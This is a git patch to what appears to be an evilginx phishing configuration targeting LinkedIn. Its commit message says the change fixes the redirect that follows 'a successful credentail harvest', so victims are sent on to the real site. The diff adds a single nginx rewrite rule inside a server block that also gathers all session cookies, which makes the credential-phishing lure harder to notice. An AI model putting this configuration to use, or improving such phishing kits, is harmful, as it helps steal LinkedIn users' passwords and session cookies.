From 67786020c0d524811e1e14cbba8013e090f8a6d2 Mon Sep 17 00:00:00 2001 From: Leon Denard Date: Fri, 11 May 2018 19:15:46 +0000 Subject: [PATCH] When running a linked in evilginx page, it does not properly redirect after a successful credentail harvest to the legitimate linked in site. With this redirect statement, it does like it is supposed too. --- sites/linkedin/www.linkedin.com.conf | 1 + 1 file changed, 1 insertion(+) diff --git a/sites/linkedin/www.linkedin.com.conf b/sites/linkedin/www.linkedin.com.conf index 50e7f5c..db6a98f 100644 --- a/sites/linkedin/www.linkedin.com.conf +++ b/sites/linkedin/www.linkedin.com.conf @@ -133,6 +133,7 @@ server { ngx.var.set_cookies_all = allcookies end } + rewrite ^/uas/{{COOKIE_HOST[0]}}$ https://{{TARGET_HOST[0]}} permanent; } }